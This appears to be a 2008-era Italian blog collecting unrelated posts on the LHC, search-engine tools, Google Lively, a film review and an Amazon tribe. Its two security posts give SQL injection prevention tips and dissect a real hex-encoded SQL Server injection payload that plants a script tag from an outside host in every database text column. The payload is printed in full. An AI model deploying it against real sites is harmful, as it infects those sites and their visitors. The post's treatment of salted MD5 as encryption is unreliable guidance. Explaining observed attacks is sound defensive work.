I numeri del crollo della settimana scorsa delle borse di tutto il mondo si sono tradotti in emozioni sui volti dei trader…questi i risultati: 1 - 2

Hugo Chávez: “All’inferno, yankee di m…” ed espelle l’ambasciatore USA dal Venezuela (video).

Nello stesso giorno Sarah Louise Heath Palin, la vice di John McCain: “Guerra alla russia? Forse!”.

Ed è tecnicamente fallita una delle banche più grandi USA, la Lehman Brothers.

Il commento di Red: “Siamo alla svolta”

Sfiorata la fine del mondo questa mattina: è stato infatti attivato l’LHC, l’acceleratore di particelle piu’ grande e potente del mondo costato oltre 6 miliardi di euro, un tunnel sotterraneo a forma di anello lungo 27 chilometri che ospita 1600 magneti superconduttori raffreddati fino alla temperatura di -271°C.

Uno degli obiettivi è la particella di Dio, o bosone di Higgs, dalla quale avrebbe avuto origine la vita. Ma Stephen Hawking, il più celebre scienziato vivente, «maestro del tempo» e dei segreti dei buchi neri, ha scommesso cento dollari che non lo troveremo. «Dimostrerebbe che c’è qualcosa di sbagliato nelle nostre idee e che dobbiamo pensare di più per trovare altre spiegazioni. Per questo ho scommesso cento dollari che non lo troveremo».

Per il presidente del Cnr ed ex direttore del Cern, il test di oggi è “Estremamente importante. Con Lhc si apre una nuova generazione di macchine, e inoltre - precisa Maiani - il principio delle collisioni che oggi viene applicato con Lhc è stato inventato in Italia negli anni ‘60, a Frascati, nell’anello dell’accelleratore Ada da un fisico austriaco che all’epoca si era trasferito a fare ricerca da noi”.

Nei prossimi giorni verranno iniettati nuovi fasci di protoni, che verranno poi accelerati e fatti scontrare. Sono 4 gli esperimenti principali su cui si concentreranno i circa 3.000 fisici coinvolti nel progetto: Atlas e Cms daranno la caccia al bosone di Higgs, la cosiddetta “particella di Dio” che ha dato massa a tutte le altre, Lhcb studierà le differenze tra materia e antimateria, mentre Alice si occuperà dello stato della materia nei primi istanti dell’universo.

Approfondimenti:
E’ andato tutto come previsto
Oggi la prova del Big Bang, ma Hawking scommette: fallirà

Questi strumenti offrono rapporti dettagliati sulla visibilità delle pagine sui principali motori di ricerca, e rappresentano un modo rapido e gratuito per permettere ad ogni webmaster di controllare che il proprio sito sia conforme alle indicazioni di Google, Yahoo e Live.

• Strumenti Google per il webmaster
• Yahoo Site Explorer
• Webmaster Center - Live Search

Tra l’altro quello di Yahoo è stato recentemente migliorato: sono stati introdotti una nuova interfaccia e un maggior numero di statistiche…ma per uno dei miei siti sono completamente disallineate dai dati forniti nell’indice: 23mila pagine crawled e 35mila conosciute vs 1 sola pagina restituita nelle SERP…

*

Approfondimenti: Yahoo! Search Blog - Site Explorer Gets a Makeover

Le parole sono la chiave per accedere alle informazioni sul web. Chi lavora nel campo del marketing e dell’advertising online, è interessato proprio a queste chiavi di ricerca.

Google mette a disposizione di questi professionisti un set di strumenti: si va dal classico Google AdWords: Keyword Tool (che ora offre anche dati numerici sul volume di ricerca) al più recente Insights for Search: See what the world is searching for.

Google Insights for Search permette di confrontare i trend di ricerca di più termini nello spazio (cioè confrontando l’interesse in diverse regioni geografiche) e nel tempo, filtrando i risultati per categoria (Apple in Computers&Electronics è diverso da Apple in Food&Drink).

Lo conferma anche Hal Varian, capo economista di Google, che parla di interessanti usi economici di questo servizio, per esempio nel campo delle ricerche di finanza, negli studi sociologici, nelle previsioni economiche. «Per esempio» afferma Varian «se in una zona si registrasse una forte frequenza di richieste della parola casa o correlati, potrebbe significare un boom di vitalità nel mercato immobiliare».

Approfondimenti:
Le parole più usate nei motori di ricerca: nuovo servizio Google Insights

Create an avatar and chat with your friends in rooms you design.

Un giorno alla settimana gli impiegati di Google abbandonano le normali responsabilità per dedicarsi a progetti scaturiti da idee proprie; Gmail è nato in questo modo, e Google Lively, 20 percent project di Niniane Wang (engineering manager di Google) è il nuovo arrivato.

In foto, 3 donzelle su Second Life

Ma quali sono le differenze con Second Life? Incuriosito, ho scaricato il plugin di Lively, mi sono autenticato con il mio Google account, ho personalizzato il mio avatar e ho creato la mia stanza: a quel punto è bastato fare copia/incolla del codice generato automaticamente.

Ed ecco il risultato: una chat in 3d accessibile da browser.

Niente contenuti custom come Second Life, niente compravendita di prodotti, nessun ambiente condiviso in cui tutti gli avatar possano convergere…solo una miriade di universi paralleli.

La filosofia di Lively è “Be who you want on the web pages you visit“: un modo di creare un piccolo mondo virtuale su misura, da condividere con i propri contatti online (amici, colleghi, familiari…interlocutori d’affari).

Lively punta sulla capacità di disseminarsi in pagine web, di sparpagliarsi nei blog e di integrarsi con Facebook e prossimamente con MySpace. Un nuovo livello di social network, un anello di congiunzione fra contenuti digitali (YouTube e anche Picasa “sulla carta”, ma io non sono riuscito a visualizzare foto), blog, wiki, widget e strumenti di comunicazione tradizionale, come la posta elettronica.

C’è già chi parla di prove tecniche per la creazione di un possibile Internet 3D…staremo a vedere!

Approfondimenti:
Ecco Lively, la “Second Life” secondo Google
Google Lively è la chat 3D distribuita

E’ il 2057: Il Sole si sta spegnendo.

Un gruppo composto dal capitano Kaneda, un fisico, una biologa, un addetto alle comunicazioni, un matematico, una pilota, un meccanico ed uno psicologo intraprende un viaggio.

Insieme a un ordigno atomico di massa pari a quella dell’isola di Manhattan.

La caratteristica del buio è che ci galleggi dentro: tu e l’oscurità siete separati l’uno dall’altra perché l’oscurità è assenza di qualcosa, è un vuoto. La luce, al contrario, ti avvolge. Diventa parte di te.

Uscito nel 2007, Sunshine è un film di fantascienza inglese diretto da Danny Boyle e scritto da Alex Garland (coppia che mi aveva piacevolmente sorpreso con The Beach), che racconta il pericoloso viaggio di Icarus II verso il Sole.

Anche se in chiusura perde colpi, Sunshine mi ha colpito…l’impatto della prima parte è granitico…se vi capita dateci uno sguardo

Prevenire le Sql Injection

Quando un utente malizioso interagisce con il nostro software, si mette alla ricerca dei punti deboli e tenta di rompere il sistema proprio lì; perciò, possiamo affermare che un sistema è tanto sicuro quanto è sicura la sua parte più debole.

Andiamo dunque ad esaminare tutte le componenti da mettere in sicurezza; le operazioni consigliate possono sembrare molto semplici ma, forse per disattenzione, forse per la fretta di rilasciare un prodotto, non sempre vengono effettuate (ed il recente boom di infezioni lo dimostra).

Conosci i tuoi dati

Se un’applicazione web richiede all’utente di scegliere ad es. una data, è bene validare tipo, lunghezza, formato e range client-side (in JavaScript) e server-side.

Prima del viaggio verso il lato server, è bene filtrare i dati per aggiungere caratteri di escape a caratteri che hanno un significato speciale in SQL, ad es. l’apostrofo. Tenere presente che questi filtri non hanno effetto sugli attacchi che impiegano caratteri ASCII in esadecimale; in tal caso, la difesa dovrà avvenire più in profondità.

Se poi il dato che viaggia è sensibile (ad es. informazioni sugli utenti, specialmente se finanziarie) criptarlo è d’obbligo, ad es. tramite un salted hash, ad es. MD5.

Conosci i tuoi utenti

Assegnare agli utenti del database i privilegi strettamente necessari: un’applicazione web che si connette ad un db usando l’account dell’amministratore da’ all’attaccante il potenziale di eseguire qualunque comando.

Inoltre, se l’attaccante riesce ad agire fuori dei confini del db (ad es. usando la procedura xp_cmdshell), potrebbe acquisire accesso illimitato alla macchina che ospita SQL Server. Infatti, quando un’istanza di SQL Server viene installata, viene creato un servizio in esecuzione in background (che processa i comandi dalle applicazioni ad esso connesse) appartenente all’account di sistema locale (il più potente su una macchina Windows, persino più potente dell’account amministrativo). Perciò, Microsoft raccomanda che durante l’installazione di SQL Server il server venga eseguito da un account che possa accedere soltanto alle risorse strettamente necessarie.

Approfondimenti:
Sql Injection

Scoperta Tribù di Uomini rossi al confine tra Perù e Brasile

José Carlos Meirelles, sertanista della FUNAI, ha partecipato alla scoperta di Indios mai venuti a contatto con il resto del mondo nell’Amazzonia brasiliana.

Al momento del sorvolo molti indios sono fuggiti nella foresta, per lo più donne e bambini, ma non sono scappati i guerrieri, dipinti di rosso con la pianta dell’urucum, che hanno affrontato con archi e frecce il grande uccello venuto dal cielo.

Erano dodici anni che un’etnia sconosciuta non veniva scoperta nell’Amazzonia brasiliana.

Dagli anni 80 la FUNAI brasiliana ha adottato la politica di non cercare “contatto umano” con gli indios isolati, limitandosi a sorvolare con aerei o elicotteri le zone, una volta all’anno o ogni due anni, per controllare lo stato degli indigeni.

Le minacce alla Tribù

Sono popolazioni messe a rischio dall’industria mineraria e da quella del legname che disbosca i territori dove abitano. Malattie innocue per gli occidentali risultano completamente nuove e quindi letali per loro. Inoltre, si stanno avvicinando alla loro zona vergine dei garimpeiros (cercatori d’oro clandestini) e dei piantatori di coca provenienti dal Perù.

Approfondimenti:
- AMAZZONIA: SCOPERTA TRIBU’ INDIOS, L’ULTIMA DA 12 ANNI
- Le Foto mai viste della Tribù
- Sono minacciati da industria mineraria

Ecco un esempio di Sql injection per SQL Server, che viene aggiunta alla fine di una URL dinamica. Ovviamente effettuare tale procedura è illegale: don’t try this at home!

Il codice da iniettare nell’URL dinamica.

DECLARE @S VARCHAR(4000);SET
@S=CAST(0x4445434C415245204054205641524348415228323535292C
404320564152434841522832353529204445434C415245205461626C655
F437572736F7220435552534F5220464F522053454C45435420612E6E6
16D652C622E6E616D652046524F4D207379736F626A6563747320612C7
37973636F6C756D6E73206220574845524520612E69643D622E6964204
14E4420612E78747970653D27752720414E442028622E78747970653D39
39204F5220622E78747970653D3335204F5220622E78747970653D3233
31204F5220622E78747970653D31363729204F50454E205461626C655F
437572736F72204645544348204E4558542046524F4D205461626C655F
437572736F7220494E544F2040542C4043205748494C45284040464554
43485F5354415455533D302920424547494E2045584543282755504441
5445205B272B40542B275D20534554205B272B40432B275D3D5254524
94D28434F4E5645525428564152434841522834303030292C5B272B404
32B275D29292B27273C736372697074207372633D687474703A2F2F7777
772E61647739352E636F6D2F622E6A733E3C2F7363726970743E272727
29204645544348204E4558542046524F4D205461626C655F437572736F
7220494E544F2040542C404320454E4420434C4F5345205461626C655
F437572736F72204445414C4C4F43415445205461626C655F437572736
F7220 AS VARCHAR(4000));
EXEC(@S)

Si tratta di una injection utilizzata durante un attacco reale ad un noto sito italiano ed a molti altri siti in rete.

Come vedete, prima si dichiara una variabile, poi la si inizializza con il valore 0x4445434C41524520…ma cosa significa? Si tratta di un valore espresso nel sistema numerico esadecimale (identificato dal prefisso ‘0x’), che dopo il cast in varchar svela la sua vera natura: è una query per Sql Server.

La Query che verrà eseguita.

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''< scri pt src=http://www.ad w95.com/b.js>‘'’) FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Questa query modifica tutte le colonne del database, aggiungendo il seguente script:

< scri pt src=http://www.ad w95.com/b.js>

Che, stampato nelle pagine dei siti compromessi, sfrutterà eventuali bug del browser del malcapitato utente.

Disclaimer.

Tutte le informazioni e le tecniche sono state descritte solo per fini educativi e qualsiasi uso malizioso di queste informazioni è illegale e fortemente scoraggiato.

Approfondimenti:
Lo stesso attacco è stato rilevato da blazo
Sql Injection